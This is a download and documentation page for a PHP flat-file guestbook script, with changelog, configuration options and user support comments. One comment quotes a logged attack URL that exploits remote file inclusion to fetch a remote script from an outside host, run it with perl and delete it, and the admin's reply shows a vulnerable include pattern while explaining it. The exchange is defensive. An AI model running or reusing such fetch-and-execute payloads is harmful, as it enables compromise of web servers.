Welcome to Dagon Design. In addition to free scripts, WordPress plugins, and articles, we offer a variety of services including custom theme design, plugin creation, and PHP scripting. Contact me for more information.

Version 2.45   Updated Wednesday, July 1st, 2009 at 7:19pm

Secure Guestbook Script with Image Verification

This is the latest version of my secure PHP guestbook script. A lot of new features have been added since the last release including support for entry moderation, separate configuration and language files, improved code and session handling, and much more. The purpose of this script is to provide an easy to use, yet secure guestbook which features image verification to keep out spam bots as well as other security measures. It uses a flat-file storage method so that it will work for users without database access and contains many other features not found in most standard guestbook scripts.

Download

  If you have found this page useful, please consider donating. Thanks!

Included Languages

The script current includes files for the following languages: English, Dutch, Formal German, French, Italian, Norwegian, Portuguese, Romanian, Spanish, Swedish, Turkish

See it in action

I have a demo guestbook here: Demo guestbook

Installation

  • Download ddgb.zip and uncompress
  • Upload all files into a directory of your choosing
  • Give write-access to /dat/.entries and /dat/.banlist (chmod 666 or 777)
  • Configure the options in config.php
  • Run the script by calling ddgb.php

Changelog

  • 07-01-09 – Not a version update, but the spanish language file has been updated, and the missing header.php file (when used in stand-alone mode) has been restored.
  • 02-22-09 v2.45 – Several new features from contributor Hans Nordhaug, including: alt attributes added for valid xhtml, increased spam protection (honeypot field), made page navigation translateable, various visual changes.
  • 07-27-07 Vv2.44 – PHP short-tag bug fixed. Italian language file added.
  • 06-20-07 v2.43 – File locking feature is now an option (disabled by default), instead of automatically enabled
  • 06-13-07 v2.42 – Security update
  • 04-04-07 – Spanish language file has been added
  • 03-24-07 – Romanian language file has been added
  • 01-14-07 v2.41 – Fixed bug related to display of entries
  • 11-01-06 v2.4 – Moderation/display issues 100% resolved – Smilies are now clickable – Various bug fixes
  • 10-22-06 v2.31 – Further improvements to the session code – Should work better on Windows servers now
  • 10-21-06 v2.3 – Fixed bug with display of entries when moderating – Improved session code – Dutch language file has been added
  • 10-17-06 – Not a version update – Swedish and Portuguese language files have been added
  • 09-07-06 v2.2 – Bug fixed (verification problems in non-standalone mode)
  • 09-01-06 v2.1 – Various minor fixes – Added Norwegian language file
  • 08-24-06 v2.0 – This is a very big update. Because of this, almost all of this page has been rewritten. Unfortunately, previous data files will not work with this release because of the new data structure. The advantage is that new fields can be added in the future without loosing the old data! The new data file is also simple enough that you should be able to manually add your old entries into it. New features include:
    - Separate config and language files
    - Option to require manual approval/moderation of entries
    - Improved session handling (no more separate verification file!)
    - Option to run as stand-alone script, or through another page
    - Secure data file storage method already implemented
    - Now supports basic smilies
    - Can disable image verification if not supported
    - New option to protect email addresses
    - And more – read below
  • 05-17-06 – Not a version update, but I added instructions on making the guestbook even more secure.
  • 05-03-06 v1.31 – Fixed a bug when editing entries – Name, website, and email fields can now be modified on existing entries.
  • 03-16-06 v1.3 – Revised layout a tiny bit – Now checks for GD support and gives error if missing – Adds http:// prefix if not entered in web address – IP addresses of posters shown in admin box – Can now ban posters by IP (removes all of their posts too) – Added confirmation before deleting and banning
  • 02-16-06 v1.2 – Added option to allow or disallow html in posts – Fixed a magic quotes bug
  • 02-06-06 v1.1 – Added option to prevent search engine robots from following links posted by visitors (using the nofollow tag)
  • 02-02-06 v1.0 – First public release!

Some of the features

  • Flat-file storage with precautions in place to prevent data files from being viewed.
  • Various security measures to prevent abuse.
  • Separate config and language files.
  • Image verification support (can be disabled if your server does not support the GD library).
  • Administrative interface to edit and delete entries, ban IPs (and automatically remove entries from that IP), and an option to enable manual approval of entries.
  • Implements ‘nofol’ tag to prevent search engine spiders from following links in entries (discourages some spammers).
  • HTML in posts disabled by default – you can enable this if you like, but it is a big risk.
  • Option to run as stand-alone script or included through another page.
  • Smilies are supported (either enter in the code, or click to add!)

Notes

If you want to include this script inside another page, be sure to set the proper ’stand alone’ setting in the config file. You may also need to include the session_start function at the very top of the PHP file you are including the script from:

<?php session_start(); ?>

Then just include the script in your file like this:

<?php include 'ddgb.php'; ?>

Overview of the options

These options can be set in config.php file

Path to ddgb.php

This needs to be set to the full url of the ddgb.php file on your server. Example: http://www.yoursite.com/ddgb/ddgb.php

Path to ddgb-verify.php

This needs to be set to the full url of the ddgb-verify.php file on your server. Example: http://www.yoursite.com/ddgb/ddgb-verify.php

Locale Setting

This allows you to choose the language file the script will use. The current version includes English and Formal German. You can also create your own by using one of the existing files as a template. Just set this option to the name of the file (without the .php) that you want to use.

Administrator Password

This is the password used to perform the administrative functions – editing, deleting, banning, and moderating. Be sure to change the default password.

Administrator Email

Used for new entry notification, if the feature is enabled.

Send Notifications of New Entries

If enabled, admin will receive email for all new entries.

Run as Stand-Alone Script

If you plan to run this script by itself, leave this option set to TRUE. If you want to include it in another page, set it to FALSE, and take a look at the information above under the ‘Notes’ section.

Title Tag

This is the title of the page when the script is used in stand-alone mode.

Path to Data File

This is the location of the data file used to store entries. Be sure to give it write-access (chmod 666 or 777).

Path to Ban File

This is the location of the data file used to store banned IPs. Be sure to give it write-access (chmod 666 or 777).

Requre Manually Entry Approval

If enabled, this will require that the admin manually approve posts. To do this, simply log in using the admin link and you will see all of the posts (including the ones not yet approved). Just click the appropriate link to approve them, or delete them instead if you wish.

Enable Smiles

If enabled, this option will convert text-smilies into images. It will also show the available smilies on the ‘new entry’ page.

Show Introduction Text

This is an optional intro which can be shown above the guestbook. The text it uses can be found in the language file you are using. This is disabled by default.

Disable Image Verification

If this script tells you that your server does not support image verification because you do not have access to the GD library, or you simply wish to disable image verification, set this to TRUE.

Image Verification Colors

This allows you to easily change the colors of the verification image. You can enter either 3 or 6 character hex color codes.

Path to CSS File

This is the location of the script’s CSS file, which controls the look of the guestbook.

Entries Per Page

Determines how many entries will be shown on each page. If there are more entries than this number, the guestbook will be split up into multiple pages.

Allow HTML in Messages

This option is dangerous because it allows visitors to enter HTML, which is a big security risk. It is disabled by default.

Protect Email Addresses

With this option enabled, email addresses will be shown in the following format instead of as traditional links: someone [at] somewhere [dot] net.

Enable File Locking

File locking is not supported by all servers. If you would like to use this feature, set this to TRUE.

Email Notification of Posts

For those of you who would like to receive email notification anytime someone adds a new entry, here is a simple mod. First, find this line in the main script file (ddgb.php):

echo '<p>' . _ADDED_THX . '</p>';

Right after it, add the following:

mail('user@domain.com', 'New Guestbook Entry', 'A New Guestbook Entry was added!');

Be sure to set your email address. The second parameter is the subject, and the third parameter is the message.

You can also use the following variables for your email’s subject or message: $fm_name $fm_website $fm_email $fm_location $fm_message. For example:

mail('user@domain.com', 'New Guestbook Entry', 'A New Guestbook Entry was added by' . $fm_name);

If this method does not work for you, it may have to do with the way your server is configured. Some hosts require that you manually configure the sendmail parameters for the PHP mail function to work properly. If you think this might be the case, you can try the following code instead:

$to = "user@domain.com";
$from = "user@domain.com";
$subject = "New Guestbook Entry";
$body = "A new guestbook entry has been added to your site.";
ini_set("SMTP","localhost");
ini_set("sendmail_from",$from);
$result = mail($to, $subject, $body, "From: $from");

Changing the timezone

If you would like to change the timezone setting for the script, edit config.php and find the following line:

// *** START OF OPTIONS ***

After it, add the following:

date_default_timezone_set('TIMEZONE');

Where TIMEZONE is a valid timezone identifier.

Troubleshooting

If you are having trouble getting the verification code to display, one thing to try is setting the $verify_path option to the filename of the verfication file, instead of the full URL to it. Example:

$verify_path = "ddgb-verify.php";

Pages: « 4411 10 9 8 7 6 [5] 4 3 2 1 » Show All

  1. 75
    Stephan
    6-19-06 2:40PM

    Dear Allister,

    I think a feature of the otherwise great great guestbook could be to have the e-mail-adresses of the guestbook visitors only viewable by request. Like if they are publicly displayed, like in your demo, the visitors will have the e-mail accounts full of SPAM because their addy is public on the net.

    So what I think would be great is some link that says “eMail”, and then using some JavaScript or something the e-mail-addy of the visitor is displayed in a pop up or something, so the visitors can e-mail each other if they wish, but there’s no way to collect the e-mail-address for those SPAM bots that search the .html pages for adresses.

    What do you think?

    Would be glad to hear back from you :-)
    and once again great script
    - Stephan :-)

  2. 74
    Richard
    6-6-06 11:45PM

    Thanks for checking this out… perhaps it was just a hacker trying their luck . I’m relieved to know the script is secure against this type of attack.

  3. 73
    Admin
    6-6-06 6:16PM

    Richard: After looking through that tool, I feel that I can safely say this script cannot be affected by it.

    First off, it seems to depend on remote includes being enabled in php, which most servers do not, due to the inherent security risk.

    Secondly, it works by taking advantage of scripts which use input from the user to determine what file(s) to open. Here is a very basic example:

    include ($_GET['the_file']);

    Without proper validation, and remote includes enabled, a malicious visitor could open up any remote script on your server.

    This script does not use any user input at all for includes, and it will not accept invalid arguments passed to it, and all user input is validated and ‘made safe’ before it is displayed on the screen. :)

  4. 72
    Richard
    6-6-06 12:43AM

    I’m getting hack attempts through your guestbook script. The hacker is using “Defacing Tool 2.0 by r3v3ng4ns” and is trying to access via something like this:

    /index.php?action=http://61.1.197.244/x/tool25.txt?&cmd=cd%20/tmp/;fetch%20http://home.arcor.de/wolfgangbrueggmann/xi.txt;perl%20xi.txt;rm%20-rf%20xi.txt*?

    can you check that your script is secure?

  5. 71
    Melo
    6-1-06 2:51AM

    Hello, tanks for the tip Admin , my knowledge on php is very little, i have to study more on php

    My regards
    Melo

  6. 70
    Admin
    5-31-06 9:43AM

    Joshua: Did you go through and make sure all the options are still set properly? When do you see that message exactly? When you make a new post? Or just view the guestbook?

    Melo: In the script, find the following line:

    echo '<p>Entry added!</p>';

    Right before it, add the following:

    mail('user@domain.com', 'New Guestbook Entry', 'A New Guestbook Entry was added!');

    That is a pretty basic implementation of the mail function, but it should work for you (assuming your server supports the mail function). The parameters used are: email address, subject line, message. It should send the notification when an entry is added.

  7. 69
    Joshua
    5-31-06 6:19AM

    Hello,
    I just tried to install the latest 1.3 guestbook, but I keep getting the following error:
    “Internal Server Error
    The server encountered an internal error or misconfiguration and was unable to complete your request.
    Please contact the server administrator, webmaster@zoaworship.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

    More information about this error may be available in the server error log.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. ”

    Any idea what I can do about this? I was using 1.2 before this, and it was working perfectly fine. Thanks!

  8. 68
    Melo
    5-31-06 3:12AM

    hi Admin, I´m trying to add a function for when we have a new post in the guestbook we be able to receive a message in our email, but I am not getting there, it is possible to make this?

    Thank you very much for the help

  9. 67
    Admin
    5-25-06 11:20AM

    terryd: That would be very nice :) Glad it worked for you!

  10. 66
    terryd
    5-25-06 12:01AM

    so far, so good. all basname ref’s replaced for the “embedded” script and the other tweak mentioned in the doc. thank you again!!! I’ll solicit a donation from my friend for this!

  11. 65
    Admin
    5-24-06 7:40PM

    Yes, when you post code you need to wrap it in the code tags or it will do all sorts of weird things ;)

    In theory (that means without me looking into the code right now *grin*), I would say you should certainly be able to do that replacement. :)

    As a side note, I do not remember adding the nofollow lately.. seems like I would have added it a long time ago. Who knows :)

  12. 64
    terryd
    5-24-06 7:35PM

    oh shoot, guess i needed to escape something for the code snippet to show up correctly? anywho, the code i got a day or so ago didn’t have that rel=nofollow schtuff. :)

  13. 63
    terryd
    5-24-06 7:31PM

    actually, the code i downloaded yesterday was
    echo ‘Return to guestbook‘;
    as compared to your line of
    echo ‘Return to guestbook‘;

    (what is the significance of rel=”nofollow” ? Ah…. cool. http://microformats.org/wiki/rel-nofollow)

    I was going to hardcode it all and see how that went… this is nicer.

    I’m having a similar issue with the admin login. it just stares at me… does it follow that i can replace all instances of

    basename($_SERVER["PHP_SELF"])

    with

    $script_path

    ???

    you are amazing in your quick support, thank you…

  14. 62
    Admin
    5-24-06 6:14PM

    Ah I see (your previous post). Well still try the method I posted and see what happens :)

  15. 61
    Admin
    5-24-06 6:13PM

    terryd: Actually after I post on your guestbook, it takes me to a directory listing. It looks like the script is generating links to ‘http://ppa.meer.net/dgbook/’ instead of your actual guestbook file.

    Here is one way you can fix it for now.

    In your options section, create a new option with the path of your script:

    $script_path = 'http://ppa.meer.net/dgbook/ddgb1.php';

    Then do a search and replace in the script. Change this line:

    echo '<p><a href="' . basename($_SERVER["PHP_SELF"]) . '" rel="nofollow">Return to guestbook</a></p>';

    To this:

    echo '<p><a href="' . $script_path . '" rel="nofollow">Return to guestbook</a></p>';

    (That line will be in there several times – that is why it is easier to make an option for it now so if you ever move the script, it will be easy to update). For some reason PHP_SELF is not returning the proper path on your server. That should do the trick :)

Pages: « 4411 10 9 8 7 6 [5] 4 3 2 1 » Show All

Leave a Comment

Before you comment: If you are having an issue with a script, please make sure you have read the entire article. Also, please read through the comments because most common issues have already been discussed many times. Thanks.


Be sure to wrap all code in <code></code> tags.